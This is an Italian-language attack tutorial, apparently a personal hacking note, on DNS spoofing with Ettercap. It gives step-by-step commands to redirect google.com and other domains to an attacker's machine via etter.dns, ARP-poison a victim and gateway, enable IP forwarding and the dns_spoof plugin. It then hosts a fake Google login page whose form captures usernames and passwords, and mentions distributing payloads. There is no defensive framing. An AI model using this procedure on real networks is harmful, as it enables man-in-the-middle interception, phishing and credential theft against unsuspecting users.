tags: Web_server web_server_hacking DNS_Server_Hijacking


1. Configurazione del File Hosts per il DNS Spoofing

Il file etter.dns contiene i record che il plugin dns_spoof utilizzerà per reindirizzare le richieste DNS.

Modifica del File etter.dns

  1. Apri il file con un editor di testo:

    sudo nano /etc/ettercap/etter.dns

  2. Aggiungi i domini da spoofare e gli IP di destinazione:

    google.com A 192.168.1.100 www.google.com A 192.168.1.100 *.example.com A 192.168.1.100

    Dove 192.168.1.100 è l’IP della macchina controllata dall’attaccante (il server malevolo).

  3. Salva e chiudi il file.


2. Configurazione dell’Avvelenamento ARP

L’attacco DNS Spoofing richiede che l’attaccante si posizioni come “man-in-the-middle” tra la vittima e il gateway della rete.

Avvelenamento ARP con Ettercap

  1. Avvia Ettercap in modalità interattiva:

    sudo ettercap -G

  2. Seleziona l’interfaccia di rete:

    • Vai su Sniff > Unified Sniffing e seleziona la scheda di rete attiva.
  3. Scansione della rete:

    • Vai su Hosts > Scan for hosts.
  4. Aggiungi le vittime:

    • Vai su Hosts > Host list.
    • Aggiungi l’IP del gateway come Target 1.
    • Aggiungi l’IP della vittima come Target 2.
  5. Abilita il forwarding dei pacchetti:

    • Modifica il file /proc/sys/net/ipv4/ip_forward:

      echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward


3. Attivare il Plugin dns_spoof

  1. Abilita il plugin DNS Spoofing:

    • Vai su Plugins > Manage the plugins.
    • Seleziona e attiva dns_spoof.
  2. Inizia l’attacco:

    • Vai su Start > Start sniffing.

4. Testare l’Attacco

  • Apri un browser sulla macchina vittima e visita un dominio configurato in etter.dns (ad esempio, google.com).
  • La vittima dovrebbe essere reindirizzata all’indirizzo IP malevolo specificato.

5. Configurare un Server Malevolo

Per simulare un sito malevolo che cattura credenziali o distribuisce malware, puoi configurare un server HTTP sulla macchina dell’attaccante.

Usare Python per un Server Web

  1. Avvia un server web semplice sulla macchina dell’attaccante:

    python3 -m http.server 80

  2. Posiziona un file HTML malevolo nella directory:

    <html> <body> <h1>Benvenuto su Google!</h1> <form action="capture.php" method="post"> Username: <input type="text" name="username"><br> Password: <input type="password" name="password"><br> <input type="submit" value="Login"> </form> </body> </html>


6. Monitoraggio e Raccolta Dati

  • Usa Wireshark per catturare i pacchetti DNS e verificare che il traffico venga reindirizzato.
  • I dati delle vittime possono essere salvati tramite uno script PHP o registrati direttamente nei log del server.

  1. Configura il file etter.dns per definire i domini da reindirizzare.
  2. Avvia Ettercap, esegui l’avvelenamento ARP e abilita il plugin dns_spoof.
  3. Testa il reindirizzamento da parte della vittima.
  4. Configura un server malevolo per raccogliere informazioni o distribuire payload.